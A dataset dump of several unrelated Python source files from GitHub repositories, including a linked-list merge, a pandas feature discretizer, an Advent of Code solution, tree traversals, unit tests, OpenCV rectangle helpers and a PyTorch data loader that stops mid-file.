max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
linked_list.py | Umesh8Joshi/codewars_solutions | 0 | 12757351 | # program to merge two linked list
class Node:
    """A node of a singly-linked list."""

    def __init__(self, data, next):
        # NOTE: `next` shadows the builtin; name kept for interface compatibility.
        self.data = data  # payload stored at this node
        self.next = next  # following Node, or None at the tail
def merge(L1, L2):
    """Merge two ascending-sorted linked lists into one sorted list.

    Fixes the original, which linked `.data` values instead of nodes
    (`prev.next = L2.data`), wrote `prev.data` in the else branch, advanced
    the wrong list, and dereferenced `.data` on None after the loop
    (`L1.data == None` raises AttributeError once L1 is exhausted).

    Args:
        L1, L2: head Nodes of two sorted lists (either may be None).

    Returns:
        Head Node of the merged sorted list, or None if both inputs are empty.
    """
    # Dummy head avoids special-casing the first appended node.
    dummy = Node(None, None)
    tail = dummy
    while L1 is not None and L2 is not None:
        if L1.data <= L2.data:
            tail.next = L1
            L1 = L1.next
        else:
            tail.next = L2
            L2 = L2.next
        tail = tail.next
    # Splice in whichever list still has remaining nodes.
    tail.next = L1 if L1 is not None else L2
    return dummy.next
if __name__ == '__main__':
    # Node's signature is Node(data, next); the original swapped the
    # arguments (e.g. Node(n3, 7)), storing node objects as data.
    # Build L1: 5 -> 7 -> 10
    n3 = Node(10, None)
    n2 = Node(7, n3)
    n1 = Node(5, n2)
    L1 = n1
    # Build L2: 2 -> 6 -> 9 -> 12
    n7 = Node(12, None)
    n6 = Node(9, n7)
    n5 = Node(6, n6)
    n4 = Node(2, n5)
    L2 = n4
    merged = merge(L1, L2)
    # Walk and print the merged list; the final 'None' is printed below.
    while merged is not None:
        print(str(merged.data) + '->')
        merged = merged.next
print('None') | 4.21875 | 4 |
wittgenstein/discretize.py | imoscovitz/ruleset | 64 | 12757352 | # Author: <NAME> <<EMAIL>>
# License: MIT
from copy import deepcopy
from collections import defaultdict
import numpy as np
import pandas as pd
from wittgenstein.base_functions import truncstr
from wittgenstein.utils import rnd
class BinTransformer:
def __init__(self, n_discretize_bins=10, names_precision=2, verbosity=0):
    """Create an unfit binner.

    Args:
        n_discretize_bins: max number of bins per feature; falsy disables binning.
        names_precision: decimal places used when labelling bin edges.
        verbosity: 0 silent, 1/2 summary, >=3 per-feature detail.
    """
    self.n_discretize_bins = n_discretize_bins
    self.names_precision = names_precision
    self.verbosity = verbosity
    # Mapping {feature: [bin-name strings]}; None until fit() has run.
    self.bins_ = None
def __str__(self):
    """Show the fitted bin mapping (the string 'None' before fit)."""
    return str(self.bins_)

# repr intentionally mirrors str: the bin dict is the whole state.
__repr__ = __str__
def __bool__(self):
    # Truthy once a non-empty bin mapping has been fit (double negation
    # coerces None/{} to False, a populated dict to True).
    return not not self.bins_
def isempty(self):
    # True only when bins have been fit AND came back empty ({}).
    # NOTE(review): returns False when self.bins_ is None (never fit) --
    # that looks inverted for the "never fit" case; confirm intent before
    # relying on this method.
    return not self.bins_ is None and not self.bins_
def fit_or_fittransform_(self, df, ignore_feats=[]):
"""Transform df using pre-fit bins, or, if unfit, fit self and transform df"""
# Binning has already been fit
if self.bins_:
return self.transform(df)
# Binning disabled
elif not self.n_discretize_bins:
return df
# Binning enabled, and binner needs to be fit
else:
self.fit(df, ignore_feats=ignore_feats)
df, bins = self.transform(df, ignore_feats=ignore_feats)
self.bins = bins
return df
def fit_transform(self, df, ignore_feats=[]):
self.fit(df, ignore_feats=ignore_feats)
return self.transform(df)
def fit(self, df, output=False, ignore_feats=[]):
    """
    Returns a dict defining fits for numerical features.

    A fit is an ordered list of tuples defining each bin's range
    (min is exclusive; max is inclusive). The returned dict allows for
    fitting to training data and applying the same fit to test data
    to avoid information leak.

    NOTE(review): the `output` parameter is accepted but never used here;
    confirm whether callers rely on it before removing.
    """
    def _fit_feat(df, feat):
        """Return list of tuples defining bin ranges for a numerical feature using simple linear search"""
        if len(df) == 0:
            return []
        # NOTE(review): this capped bin count is computed but unused --
        # qcut below uses self.n_discretize_bins directly.
        n_discretize_bins = min(self.n_discretize_bins, len(df[feat].unique()))
        # Collect intervals: quantile-based cut first (equal-count bins).
        bins = pd.qcut(
            df[feat],
            q=self.n_discretize_bins,
            precision=self.names_precision,
            duplicates="drop",
        )
        if (
            len(bins.unique()) < 2
        ):  # qcut can behave weirdly in heavily-skewed distributions
            # Fall back to equal-width bins.
            bins = pd.cut(
                df[feat],
                bins=self.n_discretize_bins,
                precision=self.names_precision,
                duplicates="drop",
            )
        # Drop empty bins and duplicate intervals to create bins
        bin_counts = bins.value_counts()
        bins = bin_counts[bin_counts > 0].index
        bins = sorted(bins.unique())
        # Extend min/max to -inf, +inf to capture any ranges not present in training set
        bins[0] = pd.Interval(float("-inf"), bins[0].right)
        bins[-1] = pd.Interval(bins[-1].left, float("inf"))
        # Bins are stored as human-readable strings ('<x', 'lo-hi', '>x').
        bins = self._intervals_to_strs(bins)
        if self.verbosity >= 3:
            print(
                f"{feat}: fit {len(df[feat].unique())} unique vals into {len(bins)} bins"
            )
        return bins

    # Begin fitting: only features that look continuous are binned.
    feats_to_fit = self.find_continuous_feats(df, ignore_feats=ignore_feats)
    if feats_to_fit:
        if self.verbosity == 1:
            print(f"discretizing {len(feats_to_fit)} features")
        elif self.verbosity == 2:
            print(f"discretizing {len(feats_to_fit)} features: {feats_to_fit}\n")
    self.bins_ = {}
    for feat in feats_to_fit:
        self.bins_[feat] = _fit_feat(df, feat)
    return self.bins_
def transform(self, df):
    """Transform DataFrame using fit bins.

    Columns already containing valid bin-name strings are left alone;
    a column with strings that do not match the fit bins raises ValueError
    (via _find_transformed).
    """
    def _transform_feat(df, feat):
        # Map each numeric value of `feat` to its bin-name string.
        if self.bins_ is None:
            return df
        # NOTE(review): this copy is immediately overwritten by the
        # pd.cut result below and appears to be dead code.
        res = deepcopy(df[feat])
        bins = self._strs_to_intervals(self.bins_[feat])
        res = pd.cut(df[feat], bins=pd.IntervalIndex(bins))
        # Replace each Interval with its stored string name.
        res = res.map(
            lambda x: {i: s for i, s in zip(bins, self.bins_[feat])}.get(x)
        )
        return res

    # Exclude any feats already transformed into valid intervals
    already_transformed_feats = self._find_transformed(df, raise_invalid=True)
    res = df.copy()
    for feat in self.bins_.keys():
        if feat in res.columns and feat not in already_transformed_feats:
            res[feat] = _transform_feat(res, feat)
    return res
def find_continuous_feats(self, df, ignore_feats=[]):
"""Return names of df features that seem to be continuous."""
if not self.n_discretize_bins:
return []
# Find numeric features
cont_feats = df.select_dtypes(np.number).columns
# Remove discrete features
cont_feats = [
f for f in cont_feats if len(df[f].unique()) > self.n_discretize_bins
]
# Remove ignore features
cont_feats = [f for f in cont_feats if f not in ignore_feats]
return cont_feats
def _strs_to_intervals(self, strs):
return [self._str_to_interval(s) for s in strs]
def _str_to_interval(self, s):
floor, ceil = self._str_to_floor_ceil(s)
return pd.Interval(floor, ceil)
def _intervals_to_strs(self, intervals):
"""Replace a list of intervals with their string representation."""
return [self._interval_to_str(interval) for interval in intervals]
def _interval_to_str(self, interval):
if interval.left == float("-inf"):
return f"<{interval.right}"
elif interval.right == float("inf"):
return f">{interval.left}"
else:
return f"{interval.left}-{interval.right}"
def _str_to_floor_ceil(self, value):
    """Parse a bin-name string back into (floor, ceil) floats.

    Accepts '<x' (floor=-inf), '>x' (ceil=+inf), or 'lo-hi' where the
    first dash that is not a leading minus sign is the separator.

    NOTE(review): for a string with an extra dash after the separator
    (e.g. '1-2-3') this returns None mid-loop, which callers such as
    _str_to_interval do not handle -- confirm such inputs cannot occur.
    """
    if "<" in value:
        floor, ceil = "-inf", value.replace("<", "")
    elif ">" in value:
        floor, ceil = value.replace(">", ""), "inf"
    else:
        split_idx = 0
        for i, char in enumerate(value):
            # Found a possible split and it's not the first number's minus sign
            if char == "-" and i != 0:
                if split_idx is not None and not split_idx:
                    split_idx = i
                # Found a - after the split, and it's not the minus of a negative number
                elif i > split_idx + 1:
                    return None
        floor = value[:split_idx]
        ceil = value[split_idx + 1 :]
    return float(floor), float(ceil)
def construct_from_ruleset(self, ruleset):
    """Build a new BinTransformer whose bins mirror an already-discretized ruleset.

    Recovers (floor, ceil) ranges from the ruleset's conds, sizes
    n_discretize_bins to the widest per-feature bin count (at least 10),
    and infers the decimal precision from the recovered boundary strings.
    """
    MIN_N_DISCRETIZED_BINS = 10
    bt = BinTransformer()
    bt.bins_ = self._bin_prediscretized_features(ruleset)
    # Use the largest observed bin count, floored at the minimum.
    bt.n_discretize_bins = (
        max(
            (MIN_N_DISCRETIZED_BINS, max([len(bins) for bins in bt.bins_.values()]))
        )
        if bt.bins_
        else MIN_N_DISCRETIZED_BINS
    )
    bt.names_precision = self._max_dec_precision(bt.bins_)
    return bt
def _bin_prediscretized_features(self, ruleset):
def is_valid_decimal(s):
try:
float(s)
except:
return False
return True
def find_floor_ceil(value):
"""id min, max separated by a dash. Return None if invalid pattern."""
split_idx = 0
for i, char in enumerate(value):
# Found a possible split and it's not the first number's minus sign
if char == "-" and i != 0:
if split_idx is not None and not split_idx:
split_idx = i
# Found a - after the split, and it's not the minus of a negative number
elif i > split_idx + 1:
return None
floor = value[:split_idx]
ceil = value[split_idx + 1 :]
if is_valid_decimal(floor) and is_valid_decimal(ceil):
return (floor, ceil)
else:
return None
# _bin_prediscretized_features
discrete = defaultdict(list)
for cond in ruleset.get_conds():
floor_ceil = self.find_floor_ceil(cond.val)
if floor_ceil:
discrete[cond.feature].append(floor_ceil)
for feat, ranges in discrete.items():
ranges.sort(key=lambda x: float(x[0]))
return dict(discrete)
def _max_dec_precision(self, bins_dict):
def dec_precision(value):
try:
return len(value) - value.index(".") - 1
except:
return 0
max_prec = 0
for bins in bins_dict.values():
for bin_ in bins:
for value in bin_:
cur_prec = dec_precision(value)
if cur_prec > max_prec:
max_prec = cur_prec
return max_prec
def _find_transformed(self, df, raise_invalid=True):
    """Find columns that appear to have already been transformed.

    A fit feature whose df column has category/object dtype is assumed
    transformed. If such a column contains strings not among the fit
    bin names and raise_invalid is True, a ValueError is raised.
    """
    check_feats = df.select_dtypes(include=["category", "object"]).columns.tolist()
    invalid_feats = {}
    transformed_feats = []
    for feat, bins in self.bins_.items():
        if feat in check_feats:
            transformed_feats.append(feat)
            # Any value not matching a known bin name is suspect.
            invalid_values = set(df[feat].tolist()) - set(bins)
            if invalid_values:
                invalid_feats[feat] = invalid_values
    if invalid_feats and raise_invalid:
        raise ValueError(
            f"The following input values seem to be transformed but ranges don't match fit bins: {invalid_feats}"
        )
    return transformed_feats
| 2.90625 | 3 |
python/src/aoc/year2017/day22.py | ocirne/adventofcode | 1 | 12757353 | from collections import defaultdict
from aoc.util import load_example, load_input
def prepare_map(lines):
    """Build a sparse grid from the puzzle input.

    Returns (grid, center) where grid maps (x, y) -> cell state with '.'
    as the default, and center is the coordinate of the middle cell.
    """
    grid = defaultdict(lambda: ".")
    for row, line in enumerate(lines):
        for col, cell in enumerate(line):
            if cell == "#":
                grid[col, row] = "#"
    return grid, (len(lines) - 1) // 2
# Direction index -> (dx, dy) step: 0=up, 1=right, 2=down, 3=left
# (y grows downward, matching the row order of the input grid).
MOVEMENTS = {
    0: (0, -1),
    1: (1, 0),
    2: (0, 1),
    3: (-1, 0),
}
# Node states used by part 2's evolved virus.
CLEAN = "."
WEAKENED = "W"
INFECTED = "#"
FLAGGED = "F"
def part1(lines, n=10000):
    """
    >>> part1(load_example(__file__, "22"), 7)
    5
    >>> part1(load_example(__file__, "22"), 70)
    41
    >>> part1(load_example(__file__, "22"))
    5587
    """
    grid, center = prepare_map(lines)
    x = y = center
    facing = 0
    infections = 0
    for _ in range(n):
        if grid[x, y] == "#":
            # Infected cell: turn right and clean it.
            facing = (facing + 1) % 4
            grid[x, y] = "."
        else:
            # Clean cell: turn left and infect it.
            facing = (facing + 3) % 4
            grid[x, y] = "#"
            infections += 1
        dx, dy = MOVEMENTS[facing]
        x += dx
        y += dy
    return infections
def part2(lines, n=10000000):
    """
    >>> part2(load_example(__file__, "22"), 100)
    26
    >>> part2(load_example(__file__, "22"))
    2511944
    """
    grid, center = prepare_map(lines)
    x = y = center
    facing = 0
    infections = 0
    # state -> (next state, clockwise quarter-turns to apply)
    rules = {
        CLEAN: (WEAKENED, 3),     # turn left
        WEAKENED: (INFECTED, 0),  # keep going
        INFECTED: (FLAGGED, 1),   # turn right
        FLAGGED: (CLEAN, 2),      # reverse
    }
    for _ in range(n):
        state = grid[x, y]
        if state not in rules:
            raise
        new_state, turn = rules[state]
        grid[x, y] = new_state
        facing = (facing + turn) % 4
        if new_state == INFECTED:
            infections += 1
        dx, dy = MOVEMENTS[facing]
        x += dx
        y += dy
    return infections
if __name__ == "__main__":
data = load_input(__file__, 2017, "22")
print(part1(data))
print(part2(data))
| 2.84375 | 3 |
preorderTraversal.py | GolferChen/LeetCode | 0 | 12757354 | <gh_stars>0
from typing import List
from collections import deque
# Definition for a binary tree node.
# Definition for a binary tree node.
class TreeNode:
    """A binary tree node with a value and left/right children."""

    def __init__(self, x):
        self.val = x       # node value
        self.left = None   # left child, or None
        self.right = None  # right child, or None
# # Recursive Version
# class Solution:
# def preorderTraversal(self, root: TreeNode) -> List[int]:
# if root is None:
# return deque([])
# orders = deque([root.val])
# if root.left is None and root.right is None:
# return orders
# left_orders = self.preorderTraversal(root.left)
# right_orders = self.preorderTraversal(root.right)
# orders += left_orders
# orders += right_orders
# return orders
# Iteration Version, Wrong
# class Solution:
# def preorderTraversal(self, root: TreeNode) -> List[int]:
# if root is None:
# return []
# stack = deque([root])
# visited = deque([root])
# orders = [root.val]
# if root.left is None and root.right is None:
# return orders
# cur = root.left
# while len(stack) > 0:
# while cur and (not (cur in visited)):
# orders.append(cur.val)
# visited.append(cur)
# stack.append(cur)
# cur = cur.left
# cur_tmp = cur
# if cur is None:
# if len(stack) > 0:
# parent = stack.pop()
# if parent.right is None:
# if len(stack) > 0:
# parent_2 = stack.pop()
# cur = parent_2
# cur = cur.left
# else:
# cur = parent.right
# if not (cur is None):
# stack.append(cur)
# visited.append(cur)
# orders.append(cur.val)
# cur = cur.left
# if cur_tmp in visited:
# cur = cur_tmp.right
# if not (cur is None):
# stack.append(cur)
# visited.append(cur)
# orders.append(cur.val)
# cur = cur.left
# return orders
# # Iteration Version
# class Solution:
# def preorderTraversal(self, root: TreeNode) -> List[int]:
# stack = deque([root])
# # visited = deque([root]) # no need
# output = []
# while len(stack) > 0:
# cur = stack.pop()
# if not (cur is None): # in case that root is None
# if not (cur.right is None): # first right
# stack.append(cur.right)
# output.append(cur.val)
# if not (cur.left is None): # then left
# stack.append(cur.left)
# return output
# Iteration Version, Morris
# Iteration Version, Morris
class Solution:
    def preorderTraversal(self, root: TreeNode) -> List[int]:
        """Morris preorder traversal: O(n) time, O(1) extra space.

        Temporarily threads each node's in-order predecessor back to the
        node so the tree can be walked without a stack; all threads are
        removed before returning, leaving the tree unmodified.
        """
        result = []
        node = root
        while node is not None:
            if node.left is None:
                # No left subtree: visit and move right.
                result.append(node.val)
                node = node.right
                continue
            # Find the rightmost node of the left subtree (predecessor).
            pred = node.left
            while pred.right is not None and pred.right is not node:
                pred = pred.right
            if pred.right is None:
                # First visit: thread back, record the value, go left.
                pred.right = node
                result.append(node.val)
                node = node.left
            else:
                # Second visit: remove the thread and continue right.
                pred.right = None
                node = node.right
        return result
| 3.6875 | 4 |
tests/test_scope_finder.py | yoshrote/boss | 0 | 12757355 | <gh_stars>0
import json
import unittest
import mock
from boss.config import Configurator
from boss.scope_finder import (
initialize_scope_finder,
MemoryScopeFinder,
SQLScopeFinder
)
class ScopeFinderTests(unittest.TestCase):
    """Unit tests for scope-finder construction and lookup behavior."""

    def test_initialize_task_finder(self):
        """Test that known and arbitrary scope-finder types are handled properly."""
        mock_config = mock.Mock(spec=Configurator)
        mock_config.connections = mock.MagicMock()
        # 'hardcoded' maps to the in-memory implementation.
        self.assertIsInstance(
            initialize_scope_finder(
                mock_config,
                {'type': 'hardcoded', 'scopes': []}
            ),
            MemoryScopeFinder
        )
        # 'sqlite' maps to the SQL-backed implementation.
        self.assertIsInstance(
            initialize_scope_finder(
                mock_config,
                {'type': 'sqlite', 'connection': 'test'}
            ),
            SQLScopeFinder
        )
        # A dotted path that does not resolve is rejected.
        self.assertRaises(
            ValueError,
            initialize_scope_finder,
            mock_config, {'type': 'task_finder.that.does.not:exist'}
        )
        # A resolvable path that is not a scope finder is also rejected.
        self.assertRaises(
            ValueError,
            initialize_scope_finder,
            mock_config, {'type': 'datetime:datetime'}
        )

    @mock.patch('sqlite3.Connection')
    def test_sql_find(self, sql_mock):
        """Test SQLScopeFinder.find decodes JSON params from query rows."""
        mock_config = mock.Mock(spec=Configurator)
        mock_config.connections = {'test': sql_mock}
        scope_config = {'type': 'sqlite', 'connection': 'test'}
        scope_finder = SQLScopeFinder.from_configs(
            mock_config,
            scope_config
        )
        # Simulate two rows coming back from the cursor.
        cursor_mock = sql_mock.cursor.return_value
        cursor_mock.execute.return_value = iter([
            {'params': json.dumps({'foo': 1})},
            {'params': json.dumps({'foo': 2})}
        ])
        scope_name = 'foo'
        # Results are sorted because row order is not guaranteed.
        self.assertEqual(
            sorted(scope_finder.find(scope_name), key=lambda x: x['foo']),
            [{'foo': 1}, {'foo': 2}]
        )

    def test_memory_find(self):
        """Test MemoryScopeFinder.find returns the configured scope entries."""
        mock_config = mock.Mock(spec=Configurator)
        scope_config = {
            'type': 'hardcoded',
            'scopes': {
                'foo': [
                    {'foo': 1},
                    {'foo': 2}
                ]
            }
        }
        scope_finder = MemoryScopeFinder.from_configs(
            mock_config,
            scope_config
        )
        self.assertEqual(
            sorted(scope_finder.find('foo'), key=lambda x: x['foo']),
            [{'foo': 1}, {'foo': 2}]
        )
if __name__ == '__main__':
unittest.main()
| 2.453125 | 2 |
cflearn/modules/heads/base.py | SaizhuoWang/carefree-learn | 0 | 12757356 | <reponame>SaizhuoWang/carefree-learn
import torch
import numpy as np
import torch.nn as nn
from abc import abstractmethod
from abc import ABCMeta
from typing import Any
from typing import Dict
from typing import Type
from typing import Union
from typing import Callable
from typing import Optional
from cftool.misc import register_core
from ..transform import Dimensions
from ...types import tensor_dict_type
from ...configs import configs_dict
from ...configs import Configs
from ...protocol import DataProtocol
from ...misc.toolkit import LoggingMixinWithRank
head_dict: Dict[str, Type["HeadBase"]] = {}
class HeadConfigs(Configs, metaclass=ABCMeta):
    """Abstract config container for model heads, carrying training-data context."""

    def __init__(
        self,
        in_dim: int,
        tr_data: DataProtocol,
        tr_weights: Optional[np.ndarray],
        dimensions: Dimensions,
        config: Optional[Dict[str, Any]] = None,
    ):
        """Store head dimensions and references to the training data/weights."""
        super().__init__(config)
        self.in_dim = in_dim
        self.tr_data = tr_data
        self.tr_weights = tr_weights
        self.dimensions = dimensions

    @property
    def out_dim(self) -> int:
        """Output dimension: explicit config value, else inferred from tr_data."""
        out_dim = self.config.get("out_dim")
        if self.tr_data.is_clf:
            # Classification: one output per class.
            default_out_dim = self.tr_data.num_classes
        else:
            # Regression: match the processed target width.
            default_out_dim = self.tr_data.processed.y.shape[1]
        if out_dim is None:
            out_dim = default_out_dim
        return out_dim

    def inject_dimensions(self, config: Dict[str, Any]) -> None:
        """Copy in/out dims and the Dimensions object into a head kwargs dict."""
        config["in_dim"] = self.in_dim
        config["out_dim"] = self.out_dim
        config["dimensions"] = self.dimensions

    @classmethod
    def get(
        cls,
        scope: str,
        name: str,
        *,
        in_dim: Optional[int] = None,
        tr_data: Optional[DataProtocol] = None,
        tr_weights: Optional[np.ndarray] = None,
        dimensions: Optional[Dimensions] = None,
        **kwargs: Any,
    ) -> "HeadConfigs":
        """Look up and instantiate a registered HeadConfigs subclass.

        Raises ValueError when required context is missing or the registered
        type under (scope, name) is not a HeadConfigs subclass.
        """
        if in_dim is None:
            raise ValueError("`in_dim` must be provided for `HeadConfigs`")
        if tr_data is None:
            raise ValueError("`tr_data` must be provided for `HeadConfigs`")
        if dimensions is None:
            raise ValueError("`dimensions` must be provided for `HeadConfigs`")
        cfg_type = configs_dict[scope][name]
        if not issubclass(cfg_type, HeadConfigs):
            raise ValueError(f"'{name}' under '{scope}' scope is not `HeadConfigs`")
        return cfg_type(in_dim, tr_data, tr_weights, dimensions, kwargs)
class HeadBase(nn.Module, LoggingMixinWithRank, metaclass=ABCMeta):
    """Abstract base for model heads; concrete heads register themselves by name."""

    def __init__(self, in_dim: int, out_dim: int, **kwargs: Any):
        """Store input/output dims; `dimensions` must be present in kwargs."""
        super().__init__()
        self.in_dim, self.out_dim = in_dim, out_dim
        self.dimensions: Dimensions = kwargs["dimensions"]

    @abstractmethod
    def forward(self, net: torch.Tensor) -> Union[torch.Tensor, tensor_dict_type]:
        """Run the head on `net`; may return a tensor or a dict of tensors."""
        pass

    @classmethod
    def register(cls, name: str) -> Callable[[Type], Type]:
        """Class decorator that registers a head implementation under `name`."""
        global head_dict
        return register_core(name, head_dict)

    @classmethod
    def make(cls, name: str, config: Dict[str, Any]) -> "HeadBase":
        """Instantiate the head registered under `name` with `config` as kwargs."""
        return head_dict[name](**config)
__all__ = [
"head_dict",
"HeadConfigs",
"HeadBase",
]
| 2.03125 | 2 |
lambda-sqs-cdk/app.py | iobreaker/serverless-patterns | 2 | 12757357 | #!/usr/bin/env python3
from aws_cdk import App
from lambda_sqs_cdk.lambda_sqs_cdk_stack import LambdaSqsCdkStack
# CDK entry point: create the app, register the stack, emit the template.
app = App()
LambdaSqsCdkStack(app, "LambdaSqsCdkStack")
app.synth()
| 1.507813 | 2 |
nodejs-scrapper/cron_config_example.py | MichalSkoula/pi-dashboard-2 | 0 | 12757358 | <reponame>MichalSkoula/pi-dashboard-2
# Path to the local webserver document root where generated files are placed.
local_webserver = '/var/www/html'
# SSH/SFTP upload target; fill in before use.
# NOTE(review): credentials are stored in plaintext here -- prefer key-based
# auth or environment variables for real deployments.
ssh = dict(
    host = '',         # remote hostname or IP
    username = '',
    password = '',
    remote_path = ''   # destination directory on the remote host
)
| 1.617188 | 2 |
apps/core/base/urls.py | GMNaim/Online-Exam-System | 0 | 12757359 | <gh_stars>0
from django.urls import path, include
from .views import dashboard
# URL namespace for reversing, e.g. reverse('base:dashboard').
app_name = 'base'
urlpatterns = [
    # Delegate /api/ to the app's REST API url module.
    path('api/', include('apps.core.base.api.urls')),
    # App root serves the dashboard view.
    path('', dashboard, name='dashboard'),
]
| 1.53125 | 2 |
Rect.py | Triumph-Z/PR1956 | 0 | 12757360 | <reponame>Triumph-Z/PR1956<filename>Rect.py
#includes functions related with Rect computation
import numpy as np
import cv2
from shapely.geometry import Polygon
def AreaOfOverlap(rect1, rect2, rect=True):
    """Return the intersection area of two OpenCV rotated rects.

    NOTE(review): when rect=False the function falls through and returns
    None -- confirm whether a non-rect branch was ever intended.
    """
    if rect:
        poly_a = Polygon(cv2.boxPoints(tuple(rect1)))
        poly_b = Polygon(cv2.boxPoints(tuple(rect2)))
        return poly_a.intersection(poly_b).area
def CombineRects(rect1, rect2):
    """Return the minimum-area rotated rect containing both rect1 and rect2."""
    corners = np.concatenate(
        (cv2.boxPoints(tuple(rect1)), cv2.boxPoints(tuple(rect2))),
        axis=0,
    )
    return cv2.minAreaRect(corners)
def DistOfRects(rect1, rect2):
    """Euclidean (L2) distance between the center points of two rects."""
    center_a = np.asarray(rect1[0])
    center_b = np.asarray(rect2[0])
    return np.linalg.norm(center_a - center_b)
def RectOnDstImg(rect, M_src2dst,flag_box=False):
    """Map a rect from the src image onto the dst image under homography M_src2dst.

    If flag_box is True, `rect` is already a 4x2 array of corner points;
    otherwise it is an OpenCV ((cx, cy), (w, h), angle) rotated rect.
    """
    if flag_box:
        pts=PtsOnDstImg(rect,M_src2dst)
    else:
        pts=PtsOnDstImg(cv2.boxPoints(tuple(rect)), M_src2dst)
    # Re-fit a minimal rotated rect around the projected corners.
    return cv2.minAreaRect(pts)
def PtsOnDstImg(pts, M_src2dst, orderPts=True):
    """Project points from the src image to the dst image under homography M_src2dst.

    Points are lifted to homogeneous coordinates, transformed, de-homogenized,
    and rounded to integer pixel positions; optionally re-ordered TL,TR,BR,BL.
    """
    pts = np.array(pts)
    homogeneous = np.concatenate((pts, np.ones([pts.shape[0], 1])), axis=1)
    projected = np.dot(M_src2dst, homogeneous.T).T
    projected = projected / projected[:, 2, None]
    # NOTE(review): np.int0 was removed in NumPy 2.0; kept here for
    # byte-compatible behavior with the rest of this module.
    rounded = np.int0(projected[:, 0:2] + 0.5)
    return OrderPoints(rounded) if orderPts else rounded
def OrderPoints(pts):
    """Order four points as [top-left, top-right, bottom-right, bottom-left].

    The two smallest-x points form the left pair and the other two the
    right pair; within each pair the smaller y is the top point.
    """
    by_x = pts[np.argsort(pts[:, 0]), :]
    left_pair = by_x[:2, :]
    right_pair = by_x[2:, :]
    top_left, bottom_left = left_pair[np.argsort(left_pair[:, 1]), :]
    top_right, bottom_right = right_pair[np.argsort(right_pair[:, 1]), :]
    return np.array([top_left, top_right, bottom_right, bottom_left])
def CropRect(img, rect):
    """Crop `img` to a rotated rect.

    Returns (warped, M): the straightened patch and the perspective
    transform M mapping src coordinates to the patch.
    """
    pts = cv2.boxPoints(tuple(rect))  # e.g. [[0,0],[0,1],[1,1],[1,0]] <==> ((0.5, 0.5), (1.0, 1.0), -90.0)
    pts = OrderPoints(pts)
    # get width and height of the detected rectangle; OpenCV swaps them
    # depending on the reported angle convention
    if rect[2] < -45:
        height, width = int(rect[1][0]), int(rect[1][1])
    else:
        width, height = int(rect[1][0]), int(rect[1][1])
    src_pts = pts.astype("float32")
    # coordinates of the box points after the rectangle has been straightened
    dst_pts = np.array([[0, 0],
                        [width, 0],
                        [width, height],
                        [0, height]], dtype="float32")
    # the perspective transformation matrix
    M = cv2.getPerspectiveTransform(src_pts, dst_pts)
    # directly warp the rotated rectangle to get the straightened rectangle
    warped = cv2.warpPerspective(img, M, (width+1, height+1))
return warped, M | 2.296875 | 2 |
dlgpd/data/loader.py | EmbodiedVision/dlgpd | 6 | 12757361 | <gh_stars>1-10
from collections import defaultdict, namedtuple
from itertools import islice
from pathlib import Path
import gym
import torch
from sacred import Ingredient
from torch.utils.data import DataLoader
from torchvision import transforms
from .dataset import RolloutDataset
from .envs import register_envs, ENV_INFO_PENDULUM
from ..models import Belief
MODULE_PATH = Path(__file__).parent.parent.parent
data_ingredient = Ingredient("data")
@data_ingredient.config
def data_cfg():
    # Sacred config scope: each local below becomes a config entry.
    task_name = "pendulum"             # which task/environment to load
    batch_size_pairs = 1024            # transition pairs per batch
    batch_size_chunks = 16             # rollout chunks per batch
    shuffle_batches_pairs = True       # shuffle the pair loader
    shuffle_batches_chunks = True      # shuffle the chunk loader
    subset_shuffle_seed = None         # seed for sampling a rollout subset
    rollout_length = 30                # steps per recorded rollout
    chunk_length = 30                  # steps per training chunk
    data_base_dir = str(MODULE_PATH.joinpath("data"))  # rollout storage root
@data_ingredient.capture
def get_random_collection_env(task_name, variation_name=None):
    """Return (env_name, env_kwargs) configured for random data collection.

    When `variation_name` is given, the variation's kwargs are merged in.
    """
    env_info = get_env_info(task_name)
    env_name = env_info.env_name
    env_kwargs = env_info.data_collection_kwargs
    if variation_name is not None:
        env_kwargs = dict(**env_kwargs, **env_info.variation_kwargs[variation_name])
    return env_name, env_kwargs
@data_ingredient.capture
def get_control_env(task_name, variation_name=None):
    """Return (env_name, env_kwargs) configured for control/evaluation.

    Mirrors get_random_collection_env but uses the control-env kwargs.
    """
    env_info = get_env_info(task_name)
    env_name = env_info.env_name
    env_kwargs = env_info.ctrl_env_kwargs
    if variation_name is not None:
        env_kwargs = dict(**env_kwargs, **env_info.variation_kwargs[variation_name])
    return env_name, env_kwargs
def make_env(env_name, env_kwargs):
    """Register the project's custom envs, then instantiate `env_name` via gym."""
    register_envs()
    return gym.make(env_name, **env_kwargs)
@data_ingredient.capture
def get_env_info(task_name):
    """Return the static environment description for `task_name`.

    Only the 'pendulum' task is currently known; anything else is rejected.
    """
    if task_name != "pendulum":
        raise ValueError(f"No env_info for {task_name}")
    return ENV_INFO_PENDULUM
def gaussian_noise(tensor):
    """Return `tensor` with N(0, 0.01^2) noise added, clamped to [0, 1].

    Fixes the original in-place ``tensor += ...``, which mutated the
    caller's tensor as a hidden side effect before returning the clamped
    copy; this version is purely out-of-place.
    """
    noisy = tensor + 0.01 * torch.randn_like(tensor)
    return torch.clamp(noisy, 0, 1)
def encode_batch_of_pairs(batch, vae):
    """Encode a transition batch's rendering histories into latent beliefs.

    Returns a TransitionTuple of Belief objects for the current and next
    time steps.
    """
    latent_current = vae.encode_sequence(batch["rendering_history"].current)
    latent_next = vae.encode_sequence(batch["rendering_history"].next)
    # remove additional sliding window dimension introduced by "encode_sequence"
    latent_current = Belief(*[k.squeeze(0) for k in latent_current])
    latent_next = Belief(*[k.squeeze(0) for k in latent_next])
    return TransitionTuple(current=latent_current, next=latent_next)
TransitionTuple = namedtuple("TransitionTuple", ["current", "next"])
class DataHandler(object):
    """Wraps chunk- and pair-datasets behind shuffled/sequential DataLoaders.

    Provides iterators and batched accessors that move data to CUDA and
    reshape pair batches into (current, next) TransitionTuples.
    """

    def __init__(
        self,
        chunk_dataset,
        pair_dataset,
        chunk_length,
        batch_size_chunks,
        batch_size_pairs,
        shuffle_batches_chunks,
        shuffle_batches_pairs,
    ):
        self._chunk_dataset = chunk_dataset
        self._pair_dataset = pair_dataset
        # Build both a sequential and a (possibly) shuffled loader per dataset.
        self._chunk_loader_sequential, self._chunk_loader_shuffled = [
            DataLoader(
                chunk_dataset,
                batch_size=batch_size_chunks,
                shuffle=shuffle,
                drop_last=False,
                num_workers=1,
